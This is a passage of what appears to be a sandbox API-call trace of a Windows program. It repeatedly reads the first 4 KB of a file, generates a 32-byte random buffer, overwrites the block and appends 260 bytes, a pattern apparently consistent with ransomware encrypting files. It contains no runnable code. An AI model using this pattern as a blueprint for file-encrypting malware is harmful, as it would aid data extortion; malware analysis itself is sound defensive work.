0x4f10000 [0077.207] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.207] GetProcessHeap () returned 0x4f10000 [0077.207] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.207] GetProcessHeap () returned 0x4f10000 [0077.207] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.207] GetProcessHeap () returned 0x4f10000 [0077.207] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.207] GetProcessHeap () returned 0x4f10000 [0077.207] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.207] GetProcessHeap () returned 0x4f10000 [0077.207] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.207] GetProcessHeap () returned 0x4f10000 [0077.207] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.207] GetProcessHeap () returned 0x4f10000 [0077.207] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.207] GetProcessHeap () returned 0x4f10000 [0077.207] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.207] GetProcessHeap () returned 0x4f10000 [0077.207] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.207] GetProcessHeap () returned 0x4f10000 [0077.207] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.207] GetProcessHeap () returned 0x4f10000 [0077.207] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.207] GetProcessHeap () returned 0x4f10000 [0077.207] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.207] GetProcessHeap () returned 0x4f10000 [0077.207] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.207] GetProcessHeap () returned 0x4f10000 [0077.207] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.207] GetProcessHeap () returned 0x4f10000 [0077.207] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.207] GetProcessHeap () returned 0x4f10000 [0077.207] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.207] GetProcessHeap () returned 0x4f10000 [0077.208] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.208] GetProcessHeap () returned 0x4f10000 [0077.208] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.208] GetProcessHeap () returned 0x4f10000 [0077.208] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.209] GetProcessHeap () returned 0x4f10000 [0077.210] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.210] GetProcessHeap () returned 0x4f10000 [0077.210] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.210] GetProcessHeap () returned 0x4f10000 [0077.210] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.210] GetProcessHeap () returned 0x4f10000 [0077.210] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.210] GetProcessHeap () returned 0x4f10000 [0077.210] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0077.210] GetProcessHeap () returned 0x4f10000 [0077.210] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.210] GetProcessHeap () returned 0x4f10000 [0077.211] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0077.211] GetProcessHeap () returned 0x4f10000 [0077.211] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0077.211] GetProcessHeap () returned 0x4f10000 [0077.211] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0077.211] GetProcessHeap () returned 0x4f10000 [0077.211] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0077.211] GetProcessHeap () returned 0x4f10000 [0077.211] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0077.211] GetProcessHeap () returned 0x4f10000 [0077.211] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0077.211] GetProcessHeap () returned 0x4f10000 [0077.211] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.211] GetProcessHeap () returned 0x4f10000 [0077.211] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0077.211] GetProcessHeap () returned 0x4f10000 [0077.211] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.212] GetProcessHeap () returned 0x4f10000 [0077.212] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.212] GetProcessHeap () returned 0x4f10000 [0077.212] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.212] GetProcessHeap () returned 0x4f10000 [0077.212] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.212] GetProcessHeap () returned 0x4f10000 [0077.212] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.212] GetProcessHeap () returned 0x4f10000 [0077.212] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.212] GetProcessHeap () returned 0x4f10000 [0077.212] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.212] GetProcessHeap () returned 0x4f10000 [0077.212] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.212] GetProcessHeap () returned 0x4f10000 [0077.212] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.212] GetProcessHeap () returned 0x4f10000 [0077.212] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.212] GetProcessHeap () returned 0x4f10000 [0077.212] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.212] GetProcessHeap () returned 0x4f10000 [0077.212] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.212] GetProcessHeap () returned 0x4f10000 [0077.212] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.212] GetProcessHeap () returned 0x4f10000 [0077.212] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.212] GetProcessHeap () returned 0x4f10000 [0077.213] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.213] GetProcessHeap () returned 0x4f10000 [0077.213] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.213] GetProcessHeap () returned 0x4f10000 [0077.213] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.213] GetProcessHeap () returned 0x4f10000 [0077.213] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.213] GetProcessHeap () returned 0x4f10000 [0077.213] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.213] GetProcessHeap () returned 0x4f10000 [0077.213] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.213] GetProcessHeap () returned 0x4f10000 [0077.213] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.213] GetProcessHeap () returned 0x4f10000 [0077.213] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.213] GetProcessHeap () returned 0x4f10000 [0077.213] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.213] GetProcessHeap () returned 0x4f10000 [0077.213] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.213] GetProcessHeap () returned 0x4f10000 [0077.213] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0077.213] GetProcessHeap () returned 0x4f10000 [0077.213] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.213] GetProcessHeap () returned 0x4f10000 [0077.213] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0077.213] GetProcessHeap () returned 0x4f10000 [0077.213] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0077.213] GetProcessHeap () returned 0x4f10000 [0077.213] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0077.213] GetProcessHeap () returned 0x4f10000 [0077.214] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0077.214] SetFilePointerEx (in: hFile=0x784, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.214] WriteFile (in: hFile=0x784, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0077.214] WriteFile (in: hFile=0x784, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0077.214] GetProcessHeap () returned 0x4f10000 [0077.214] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0077.214] GetProcessHeap () returned 0x4f10000 [0077.214] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0077.214] GetProcessHeap () returned 0x4f10000 [0077.214] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0077.214] CloseHandle (hObject=0x784) returned 1 [0077.216] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 19 [0077.216] SetFilePointerEx (in: hFile=0x798, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.216] ReadFile (in: hFile=0x798, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0077.216] SetFilePointerEx (in: hFile=0x798, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.216] GetProcessHeap () returned 0x4f10000 [0077.216] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0077.216] GetProcessHeap () returned 0x4f10000 [0077.216] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56528 [0077.216] SystemFunction036 (in: RandomBuffer=0x7d56528, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56528) returned 1 [0077.216] GetProcessHeap () returned 0x4f10000 [0077.216] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0077.216] ReadFile (in: hFile=0x798, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0077.293] SetFilePointerEx (in: hFile=0x798, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.293] WriteFile (in: hFile=0x798, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0077.293] GetProcessHeap () returned 0x4f10000 [0077.294] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0077.294] GetProcessHeap () returned 0x4f10000 [0077.294] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.294] GetProcessHeap () returned 0x4f10000 [0077.294] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d560a0 [0077.294] GetProcessHeap () returned 0x4f10000 [0077.294] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.294] GetProcessHeap () returned 0x4f10000 [0077.294] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56870 [0077.294] GetProcessHeap () returned 0x4f10000 [0077.294] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0077.294] GetProcessHeap () returned 0x4f10000 [0077.294] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.294] GetProcessHeap () returned 0x4f10000 [0077.294] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.294] GetProcessHeap () returned 0x4f10000 [0077.294] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.294] GetProcessHeap () returned 0x4f10000 [0077.294] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.294] GetProcessHeap () returned 0x4f10000 [0077.294] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.294] GetProcessHeap () returned 0x4f10000 [0077.294] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.294] GetProcessHeap () returned 0x4f10000 [0077.294] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.294] GetProcessHeap () returned 0x4f10000 [0077.294] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.294] GetProcessHeap () returned 0x4f10000 [0077.294] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.294] GetProcessHeap () returned 0x4f10000 [0077.294] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.294] GetProcessHeap () returned 0x4f10000 [0077.294] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.294] GetProcessHeap () returned 0x4f10000 [0077.294] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.295] GetProcessHeap () returned 0x4f10000 [0077.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.295] GetProcessHeap () returned 0x4f10000 [0077.295] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.295] GetProcessHeap () returned 0x4f10000 [0077.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.295] GetProcessHeap () returned 0x4f10000 [0077.295] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.295] GetProcessHeap () returned 0x4f10000 [0077.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.295] GetProcessHeap () returned 0x4f10000 [0077.295] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.295] GetProcessHeap () returned 0x4f10000 [0077.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.295] GetProcessHeap () returned 0x4f10000 [0077.295] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.295] GetProcessHeap () returned 0x4f10000 [0077.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.295] GetProcessHeap () returned 0x4f10000 [0077.295] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.295] GetProcessHeap () returned 0x4f10000 [0077.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.295] GetProcessHeap () returned 0x4f10000 [0077.295] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.295] GetProcessHeap () returned 0x4f10000 [0077.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.295] GetProcessHeap () returned 0x4f10000 [0077.295] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.295] GetProcessHeap () returned 0x4f10000 [0077.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.295] GetProcessHeap () returned 0x4f10000 [0077.295] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.295] GetProcessHeap () returned 0x4f10000 [0077.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0077.295] GetProcessHeap () returned 0x4f10000 [0077.295] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.295] GetProcessHeap () returned 0x4f10000 [0077.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0077.296] GetProcessHeap () returned 0x4f10000 [0077.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0077.296] GetProcessHeap () returned 0x4f10000 [0077.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0077.296] GetProcessHeap () returned 0x4f10000 [0077.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0077.296] GetProcessHeap () returned 0x4f10000 [0077.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0077.296] GetProcessHeap () returned 0x4f10000 [0077.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0077.296] GetProcessHeap () returned 0x4f10000 [0077.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0077.296] GetProcessHeap () returned 0x4f10000 [0077.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0077.296] GetProcessHeap () returned 0x4f10000 [0077.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0077.296] GetProcessHeap () returned 0x4f10000 [0077.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0077.296] GetProcessHeap () returned 0x4f10000 [0077.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.296] GetProcessHeap () returned 0x4f10000 [0077.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0077.296] GetProcessHeap () returned 0x4f10000 [0077.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.296] GetProcessHeap () returned 0x4f10000 [0077.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.296] GetProcessHeap () returned 0x4f10000 [0077.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.296] GetProcessHeap () returned 0x4f10000 [0077.296] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.296] GetProcessHeap () returned 0x4f10000 [0077.297] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.297] GetProcessHeap () returned 0x4f10000 [0077.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.297] GetProcessHeap () returned 0x4f10000 [0077.297] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.297] GetProcessHeap () returned 0x4f10000 [0077.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.297] GetProcessHeap () returned 0x4f10000 [0077.297] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.297] GetProcessHeap () returned 0x4f10000 [0077.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.297] GetProcessHeap () returned 0x4f10000 [0077.297] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.297] GetProcessHeap () returned 0x4f10000 [0077.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.297] GetProcessHeap () returned 0x4f10000 [0077.297] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.297] GetProcessHeap () returned 0x4f10000 [0077.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.297] GetProcessHeap () returned 0x4f10000 [0077.297] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.297] GetProcessHeap () returned 0x4f10000 [0077.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.297] GetProcessHeap () returned 0x4f10000 [0077.297] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.297] GetProcessHeap () returned 0x4f10000 [0077.297] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.298] GetProcessHeap () returned 0x4f10000 [0077.298] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.298] GetProcessHeap () returned 0x4f10000 [0077.298] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.298] GetProcessHeap () returned 0x4f10000 [0077.298] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0077.298] GetProcessHeap () returned 0x4f10000 [0077.298] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.298] GetProcessHeap () returned 0x4f10000 [0077.298] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0077.298] GetProcessHeap () returned 0x4f10000 [0077.298] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0077.298] GetProcessHeap () returned 0x4f10000 [0077.298] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0077.298] GetProcessHeap () returned 0x4f10000 [0077.298] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0077.298] GetProcessHeap () returned 0x4f10000 [0077.298] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0077.298] GetProcessHeap () returned 0x4f10000 [0077.298] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0077.298] GetProcessHeap () returned 0x4f10000 [0077.298] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0077.298] GetProcessHeap () returned 0x4f10000 [0077.298] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d560a0 | out: hHeap=0x4f10000) returned 1 [0077.298] SetFilePointerEx (in: hFile=0x798, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.298] WriteFile (in: hFile=0x798, lpBuffer=0x7d7f878*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f878*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0077.299] WriteFile (in: hFile=0x798, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0077.299] GetProcessHeap () returned 0x4f10000 [0077.299] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0077.299] GetProcessHeap () returned 0x4f10000 [0077.299] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0077.299] GetProcessHeap () returned 0x4f10000 [0077.299] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0077.299] CloseHandle (hObject=0x798) returned 1 [0077.301] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 20 [0077.301] 